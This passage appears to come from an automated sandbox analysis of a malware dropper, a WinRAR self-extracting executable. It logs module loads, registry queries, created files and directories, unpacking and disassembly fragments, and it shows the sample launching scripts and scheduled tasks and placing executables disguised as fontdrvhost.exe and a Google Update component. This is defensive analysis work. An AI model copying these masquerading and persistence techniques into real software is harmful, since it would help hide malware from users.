                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                                    Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: mscoree.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: apphelp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: version.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: uxtheme.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: windows.storage.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: wldp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: profapi.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: cryptsp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: rsaenh.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: cryptbase.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: sspicli.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: ktmw32.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: ntmarta.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: wbemcomn.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: amsi.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: userenv.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: rasapi32.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: rasman.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: rtutils.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: mswsock.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: winhttp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: iphlpapi.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: dhcpcsvc.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: dnsapi.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: winnsi.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: rasadhlp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: fwpuclnt.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: secur32.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: schannel.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: mskeyprotect.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: ntasn1.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: ncrypt.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: ncryptsslp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: msasn1.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: gpapi.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: windowscodecs.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: propsys.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: dlnashext.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: wpdshext.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: edputil.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: urlmon.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: iertutil.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: srvcli.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: netutils.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: wintypes.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: appresolver.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: bcp47langs.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: slc.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: sppc.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: apphelp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: version.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: sspicli.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: ktmw32.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: rasapi32.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: rasman.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: rtutils.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: mswsock.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: winhttp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: iphlpapi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: dhcpcsvc.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: dnsapi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: winnsi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: rasadhlp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: fwpuclnt.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: wbemcomn.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: amsi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: userenv.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: winmm.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: winmmbase.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: mmdevapi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: devobj.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: ksuser.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: avrt.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: audioses.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: powrprof.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: umpdc.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: msacm32.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: midimap.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: edputil.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: dwrite.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: windowscodecs.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: ntmarta.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: dpapi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: secur32.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: schannel.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: version.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe Section loaded: sspicli.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: mscoree.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: kernel.appcore.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: version.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: uxtheme.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: windows.storage.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: wldp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: profapi.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: cryptsp.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: rsaenh.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: cryptbase.dll
                                    Source: C:\Drivers\fontdrvhost.exe Section loaded: sspicli.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\en-US\conhost.exe
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\en-US\088424020bedd6
                                    Source: eP6sjvTqJa.exeStatic file information: File size 2317084 > 1048576
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: eP6sjvTqJa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: eP6sjvTqJa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: eP6sjvTqJa.exe
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: eP6sjvTqJa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    Source: C:\Drivers\fontdrvhost.exeUnpacked PE file: 5.2.fontdrvhost.exe.2520000.7.unpack
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeFile created: C:\Drivers\__tmp_rar_sfx_access_check_4386765
                                    Source: eP6sjvTqJa.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9F640 push ecx; ret 0_2_00B9F653
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeCode function: 0_2_00B9EB78 push eax; ret 0_2_00B9EB96
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 5_2_00007FFD345553D6 push cs; ret 5_2_00007FFD345553D9
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD345600BD pushad ; iretd 24_2_00007FFD345600C1
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD345653D6 push cs; ret 24_2_00007FFD345653D9
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34571DD4 push eax; iretd 24_2_00007FFD34571DD5
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34577E87 pushad ; retf 24_2_00007FFD34577EBD
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD3459C470 push A735F181h; iretd 24_2_00007FFD3459C476
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34A89614 push eax; ret 24_2_00007FFD34A89644
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 24_2_00007FFD34A8967D push eax; ret 24_2_00007FFD34A89644
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeCode function: 25_2_00007FFD345600BD pushad ; iretd 25_2_00007FFD345600C1
